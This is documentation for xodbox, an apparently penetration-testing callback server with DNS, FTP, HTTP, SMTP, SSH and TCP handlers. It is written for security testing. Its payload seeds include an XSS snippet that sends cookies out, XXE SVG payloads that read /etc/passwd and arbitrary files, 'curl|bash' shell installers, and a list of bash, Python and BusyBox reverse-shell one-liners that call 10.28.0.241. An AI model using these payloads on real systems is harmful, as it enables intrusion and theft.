Handlers are services that listen on ports and respond to requests.
Handlers
- 1: DNS
- 2: FTP
- 3: HTTPX
- 3.1: Default Payloads Seeds
- 3.1.1: Default Header
- 3.1.2: Redirect
- 3.1.3: Robots TXT
- 3.1.4: Inspect
- 3.1.5: XSS HTML
- 3.1.6: XSS JavaScript
- 3.1.7: Default Favicon
- 3.1.8: HTML Iframe
- 3.1.9: Open Graph
- 3.1.10: XXE Callback
- 3.1.11: XXE DTD
- 3.1.12: XXE SVG Hostname
- 3.1.13: XXE SVG Passwd
- 3.1.14: XXE SVG Request Params
- 3.1.15: XXE System
- 3.1.16: Default Page
- 3.1.17: In Development Seeds
- 3.1.17.1: Build MDaaS
- 3.1.17.2: Bind Shell
- 3.1.17.3: BusyBox Reverse Shell
- 3.1.17.4: Detect platform
- 3.1.17.5: List Payloads
- 3.1.17.6: Reverse Shell
- 3.1.17.7: Simple SSH
- 3.1.17.8: Simple SSH Service
- 3.1.17.9: WPAD
- 3.2: Example Payloads
- 3.2.1: List Payloads
- 4: SMTP
- 5: SSH
- 6: TCP
1 - DNS
In development feature
This feature is in development. Please help make it awesome by providing feedback on your experience using it.
Purpose
Currently, this handler just returns a single IP address for every request. In the future, I’d like to be able to force specific DNS responses. Most should be possible using the subdomain. However, I think it would be easier to store records in the DB or config.
Configuration
Key | Values |
---|---|
handler | Must be DNS |
listener | Default :53 |
default_ip | An IP address. The default is whatever is detected as the server’s public IP. |
2 - FTP
In development feature
This feature is in development. Please help make it awesome by providing feedback on your experience using it.
Purpose
Speak FTP to other computers you may or may not control. Currently it only lists files, but I’d like to support uploads for exfil purposes.
Configuration
Key | Values |
---|---|
handler | Must be FTP |
listener | Default :21 |
server_name | Default FTP Server |
fake_dir_tree | Default test/old/fake,test/new/fake |
Additional Information
Things are still being created, documented, and fine-tuned.
3 - HTTPX
Purpose
Speak HTTP to other computers you may or may not control…
Configuration
Key | Values |
---|---|
handler | Must be HTTPX |
listener | Default :80 |
static_dir | Directory to host static files from |
payload_dir | Directory to import payloads from |
acme_email | Email to use for your ACME account |
acme_accept | A dumb way to force you to ensure you agree to the ACME provider’s (Most likely Let’s Encrypt) TOS |
acme_url | https://acme-staging-v02.api.letsencrypt.org/directory, https://acme-v02.api.letsencrypt.org/directory, or one of these: Certmagic acmeissuer.go |
tls_names | Your domains to get TLS certificates for, comma separated. I had to do wildcards first, not sure if that was a staging or DNS provider issue. |
dns_provider | Currently, namecheap or route53 but we can support anything libdns supports… |
dns_provider_api_user | Username for API calls. Only used for namecheap ATM. |
dns_provider_api_key | Key for API calls. Only used for namecheap ATM. |
Filters
The entire HTTP request is used to match filters. To alert on a specific prefix the following filter would be used.
"(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /myPrefix"
This would match:
- https://test.example/myPrefixexample
- https://test.example/myPrefix/example
- https://test.example/myPrefix/asdasd/asdasd/asd/as/d
And would not match:
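As an added example (not code from the xodbox docs or source), the Go program below runs that same filter pattern against a few constructed raw requests, assuming xodbox applies the pattern with Go's standard regexp package. Because the whole request is matched, a request whose body merely contains the text GET /myPrefix also triggers the unanchored filter; prefixing ^ restricts the match to the request line.

```go
package main

import (
	"fmt"
	"regexp"
)

// Filter pattern from the docs above. xodbox matches it against the entire
// raw HTTP request, not only the request line (assumed: Go regexp semantics).
const prefixFilter = `(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /myPrefix`

// Constructed raw requests (not captured traffic) used to exercise the filter.
var samples = []struct{ Name, Raw string }{
	{"prefix-exact", "GET /myPrefixexample HTTP/1.1\r\nHost: test.example\r\n\r\n"},
	{"prefix-nested", "POST /myPrefix/a/b/c HTTP/1.1\r\nHost: test.example\r\n\r\n"},
	{"other-path", "GET /other/myPrefix HTTP/1.1\r\nHost: test.example\r\n\r\n"},
	// The filter text appears only in the body, yet the unanchored pattern still fires.
	{"body-only", "POST /upload HTTP/1.1\r\nHost: test.example\r\nContent-Length: 13\r\n\r\nGET /myPrefix"},
}

// MatchesFilter reports whether rawRequest would trigger the given filter.
func MatchesFilter(pattern, rawRequest string) bool {
	return regexp.MustCompile(pattern).MatchString(rawRequest)
}

func main() {
	// Compare the filter as documented with a version anchored to the start of the request.
	for _, pattern := range []string{prefixFilter, "^" + prefixFilter} {
		fmt.Printf("filter %q\n", pattern)
		for _, s := range samples {
			fmt.Printf("  %-14s match=%v\n", s.Name, MatchesFilter(pattern, s.Raw))
		}
	}
}
```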
Additional Information
Things are still being created, documented, and fine-tuned.
New Features
- Let’s Encrypt Auto Cert
- Exfil data saver
Legacy Functionality to be implemented.
- robots.txt
- unfurly
- arbitrary json
- b64
- redirect
- b64
- basic auth
- breakfastbot
- allow origin *
Legacy functionality that isn’t specific to a handler
- alert pattern with payload
- alert pattern (alert patterns are part of notifiers, maybe we need to expose alert patterns based on handler type)
- slack hook (this is now a notifier)
3.1 - Default Payloads Seeds
Default payloads that come with xodbox.
3.1.1 - Default Header
Adds an HTTP header to all HTTP responses.
Example Request
curl -i http://xodbox.test/
Example Response
Server: BreakfastBot/1.0.0
3.1.2 - Redirect
HTTP redirects to the query parameter l, using the query param s as the status code.
What | Description | GET Parameters |
---|---|---|
Location | Location to redirect to | l |
Status | HTTP status code | s |
Example Request
curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"
Example Response
Location: https://github.com/defektive/xodbox
3.1.3 - Robots TXT
Simple robots txt to prevent indexing.
Example Request
curl http://xodbox.test/robots.txt
Example Response
User-Agent: *
Disallow: /
3.1.4 - Inspect
Depends on an internal code
/inspect
Inspect or reflect the request back in various formats.
- Plain Text (default, .txt)
- HTML (.html, .html)
- GIF (.gif)
- JPEG (.jpg)
- PNG (.png)
- MP4 (.mp4)
- XML (.xml)
- JSON (.json)
- Javascript (.js)
Examples
- http://localhost/inspect
- http://localhost/some/random/path/inspect.gif
3.1.5 - XSS HTML
/jsc.html
Simple HTML to load simple JS Payload.
3.1.6 - XSS JavaScript
/jsc
Simple JS payload. Useful for embedding, or for quickly copying and modifying into an XSS payload to prove execution and exfil.
(function (){
var s = document.createElement("img");
document.body.appendChild(s);
s.src="//{{.Request.Host}}/jscb?src="+window.location+"&c="+document.cookie;
})()
3.1.7 - Default Favicon
Redirects to the embedded default logo, exposed via embedded fs.
Example Request
curl -i http://xodbox.test/favicon.ico
3.1.8 - HTML Iframe
/ht
Iframe callback
3.1.9 - Open Graph
Useful for unfurlers. Maybe we should merge this into inspect…
Example Request
curl -i "http://xodbox.test/unfurl"
Example Response
Location: https://github.com/defektive/xodbox
3.1.10 - XXE Callback
XXE Callback used by xxe-system
3.1.11 - XXE DTD
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
/evil.dtd
dtd for use by others
3.1.12 - XXE SVG Hostname
/sh
attempts to get /etc/hostname
SVG with XXE payloads
3.1.13 - XXE SVG Passwd
/sp
attempts to get /etc/passwd
3.1.14 - XXE SVG Request Params
/sv
attempts to get whatever file is supplied via the f query parameter
3.1.15 - XXE System
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
3.1.16 - Default Page
Adds an HTTP header to all HTTP responses.
Example Request
curl -i http://xodbox.test/
Example Response
hi
3.1.17 - In Development Seeds
Seeds that are not tested or finished.
3.1.17.1 - Build MDaaS
3.1.17.2 - Bind Shell
curl xodbox/bind.sh|bash
3.1.17.3 - BusyBox Reverse Shell
List Payloads
# bash
bash -i >& /dev/tcp/10.28.0.241/9091 0>&1
0<&196;exec 196<>/dev/tcp/10.28.0.241/9091; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.28.0.241/9091 0<&1 2>&1
# python
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.28.0.241",9091));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
# busybox nc
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.28.0.241 9092 >/tmp/f
3.1.17.4 - Detect platform
3.1.17.5 - List Payloads
3.1.17.6 - Reverse Shell
3.1.17.7 - Simple SSH
curl xodbox/ssh.sh|bash
3.1.17.8 - Simple SSH Service
3.1.17.9 - WPAD
WPAD Proxy. Not really useful at the moment. Should be more useful in the future
3.2 - Example Payloads
Default payloads that come with xodbox.
3.2.1 - List Payloads
List Payloads
---
title: List Payloads
description: List payloads
weight: 1
pattern: /i-forgot-how-things-work$
is_final: true
data:
  headers:
    Content-Type: text/plain
  body: |
    Payloads
    {{ range .Payloads }}
    {{ .Pattern }} - {{ .Name }} [{{ .Type }}]
    {{ .Description }}
    {{ end }}
---
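The seed body above is a Go text/template rendered against the server's payload registry. As an added example (not xodbox's own code), the Go program below renders that exact body against a constructed payload set; the Payload struct, its string field types and the .Payloads map key are assumptions about what xodbox passes to the template.

```go
package main

import (
	"bytes"
	"fmt"
	"text/template"
)

// Payload carries the fields the seed body references. The field names come
// from the template; their string types are an assumption.
type Payload struct {
	Pattern, Name, Type, Description string
}

// listBody is the body of the List Payloads seed, copied from the docs above.
const listBody = `Payloads
{{ range .Payloads }}
{{ .Pattern }} - {{ .Name }} [{{ .Type }}]
{{ .Description }}
{{ end }}
`

// RenderList executes the seed body with .Payloads bound to payloads.
func RenderList(payloads []Payload) (string, error) {
	tmpl, err := template.New("list").Parse(listBody)
	if err != nil {
		return "", err
	}
	var out bytes.Buffer
	if err := tmpl.Execute(&out, map[string]interface{}{"Payloads": payloads}); err != nil {
		return "", err
	}
	return out.String(), nil
}

func main() {
	// Constructed entries based on seeds documented on this page; the Type values are made up.
	out, err := RenderList([]Payload{
		{"/redir", "Redirect", "HTTPX", "HTTP redirects to the query parameter l"},
		{"/robots.txt", "Robots TXT", "HTTPX", "Simple robots txt to prevent indexing."},
	})
	if err != nil {
		panic(err)
	}
	fmt.Print(out)
}
```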
4 - SMTP
In development feature
This feature is in development. Please help make it awesome by providing feedback on your experience using it.
Purpose
Speak SMTP to other computers you may or may not control…
Configuration
Key | Values |
---|---|
handler | Must be SMTP |
listener | Default :1587 |
Additional Information
Things are still being created, documented, and fine-tuned.
5 - SSH
In development feature
This feature is in development. Please help make it awesome by providing feedback on your experience using it.
Purpose
Speak SSH to other computers you may or may not control…
Configuration
Key | Values |
---|---|
handler | Must be SSH |
listener | Default :22 |
Additional Information
Things are still being created, documented, and fine-tuned.
6 - TCP
In development feature
This feature is in development. Please help make it awesome by providing feedback on your experience using it.
Purpose
Speak TCP…
Configuration
Key | Values |
---|---|
handler | Must be TCP |
listener | Default :9090 |
Additional Information
Things are still being created, documented, and fine-tuned.